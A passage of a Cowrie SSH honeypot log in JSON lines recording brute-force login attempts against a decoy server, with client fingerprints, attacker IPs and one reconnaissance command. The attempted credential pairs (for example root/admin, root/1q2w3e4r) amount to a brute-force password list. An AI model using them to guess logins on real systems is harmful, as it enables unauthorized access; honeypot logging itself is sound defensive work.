521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:51:36.464885Z","src_ip":"185.93.89.7","session":"bb64f2bd801e"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2023@","message":"login attempt [root/Index2023@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:51:36.549228Z","src_ip":"185.93.89.7","session":"bb64f2bd801e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:51:36.589854Z","src_ip":"185.93.89.7","session":"bb64f2bd801e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39686,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8d8a039137c","protocol":"ssh","message":"New connection: 51.79.164.132:39686 (1.2.3.4:22) [session: b8d8a039137c]","sensor":"my-vps","timestamp":"2025-08-28T08:51:39.838853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:51:40.091203Z","src_ip":"51.79.164.132","session":"b8d8a039137c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:51:40.096332Z","src_ip":"51.79.164.132","session":"b8d8a039137c"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:51:42.182848Z","src_ip":"51.79.164.132","session":"b8d8a039137c"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:51:43.595672Z","src_ip":"51.79.164.132","session":"b8d8a039137c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40338,"dst_ip":"1.2.3.4","dst_port":22,"session":"3304d2b54c9a","protocol":"ssh","message":"New connection: 51.79.164.132:40338 (1.2.3.4:22) [session: 3304d2b54c9a]","sensor":"my-vps","timestamp":"2025-08-28T08:52:06.237495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:06.582904Z","src_ip":"51.79.164.132","session":"3304d2b54c9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:52:06.583560Z","src_ip":"51.79.164.132","session":"3304d2b54c9a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:52:08.629776Z","src_ip":"51.79.164.132","session":"3304d2b54c9a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:10.099027Z","src_ip":"51.79.164.132","session":"3304d2b54c9a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41578,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e1c6a2dc27d","protocol":"ssh","message":"New connection: 185.93.89.7:41578 (1.2.3.4:22) [session: 8e1c6a2dc27d]","sensor":"my-vps","timestamp":"2025-08-28T08:52:12.273753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:12.299015Z","src_ip":"185.93.89.7","session":"8e1c6a2dc27d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:52:12.299741Z","src_ip":"185.93.89.7","session":"8e1c6a2dc27d"}
{"eventid":"cowrie.login.success","username":"root","password":"index@2023","message":"login attempt [root/index@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:52:12.402591Z","src_ip":"185.93.89.7","session":"8e1c6a2dc27d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:12.425406Z","src_ip":"185.93.89.7","session":"8e1c6a2dc27d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46934,"dst_ip":"1.2.3.4","dst_port":22,"session":"2887b88e810b","protocol":"ssh","message":"New connection: 212.227.235.229:46934 (1.2.3.4:22) [session: 2887b88e810b]","sensor":"my-vps","timestamp":"2025-08-28T08:52:16.873034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:16.879013Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T08:52:17.024640Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","sensor":"my-vps","timestamp":"2025-08-28T08:52:17.295127Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T08:52:17.295752Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","sensor":"my-vps","timestamp":"2025-08-28T08:52:17.402465Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"08:7d:52:82:55:c6:77:45:cd:a3:e7:ca:74:19:22:ed","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvCFB9wIg/ktecULO4CCaPdAAROKvR/o1iHt6HP5aAq5PwWci2DR2JqQI8FO8Sq4Irwiwn6TwFHt0IzxPqndyFmllhL2+1Ib6hTX19HEso4E7ocnte/cpx15en+NyHv0d+6BuatDJHeKrMLElmtf8dny9smb4BgG9SZggT5H6lIT55zTXNZMn0U1GUJz07WbUbAY/KO4ww5WKhmTEwEvHVkGODL3QwudpK8y6KEpyLW1A9JF30fq4SEazj7ZDRDnfCC4B7ZPaTUmBMYxP2OMZol4oBSZMB7Mc5n4wLzKhALGfX2HncCw6R/eqtw5ZXC3eQR3Ln730GKRdMKA+sJ3Cz","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T08:52:17.403128Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38020,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec87bc995d26","protocol":"ssh","message":"New connection: 185.93.89.7:38020 (1.2.3.4:22) [session: ec87bc995d26]","sensor":"my-vps","timestamp":"2025-08-28T08:52:21.514865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:21.515803Z","src_ip":"185.93.89.7","session":"ec87bc995d26"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:52:21.534075Z","src_ip":"185.93.89.7","session":"ec87bc995d26"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@2023","message":"login attempt [root/Index@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:52:21.573016Z","src_ip":"185.93.89.7","session":"ec87bc995d26"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:21.592451Z","src_ip":"185.93.89.7","session":"ec87bc995d26"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:26.879453Z","src_ip":"212.227.235.229","session":"2887b88e810b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":48912,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4faebc386fc","protocol":"ssh","message":"New connection: 201.148.180.50:48912 (1.2.3.4:22) [session: f4faebc386fc]","sensor":"my-vps","timestamp":"2025-08-28T08:52:31.988316Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:32.293036Z","src_ip":"201.148.180.50","session":"f4faebc386fc"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60370,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bde05022af3","protocol":"ssh","message":"New connection: 51.79.164.132:60370 (1.2.3.4:22) [session: 9bde05022af3]","sensor":"my-vps","timestamp":"2025-08-28T08:52:33.104322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:33.491932Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:52:33.492668Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:52:38.049116Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36178,"dst_ip":"1.2.3.4","dst_port":22,"session":"966cc20cec85","protocol":"ssh","message":"New connection: 212.227.235.229:36178 (1.2.3.4:22) [session: 966cc20cec85]","sensor":"my-vps","timestamp":"2025-08-28T08:52:38.213042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:39.841553Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:52:39.843191Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:52:40.007516Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:52:40.008258Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:41.157187Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:41.188110Z","src_ip":"51.79.164.132","session":"9bde05022af3"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:52:47.759739Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":8587,"dst_ip":"1.2.3.4","dst_port":22,"session":"09ee7fe8e962","protocol":"ssh","message":"New connection: 212.227.125.160:8587 (1.2.3.4:22) [session: 09ee7fe8e962]","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.356885Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.358566Z","src_ip":"212.227.125.160","session":"09ee7fe8e962"}
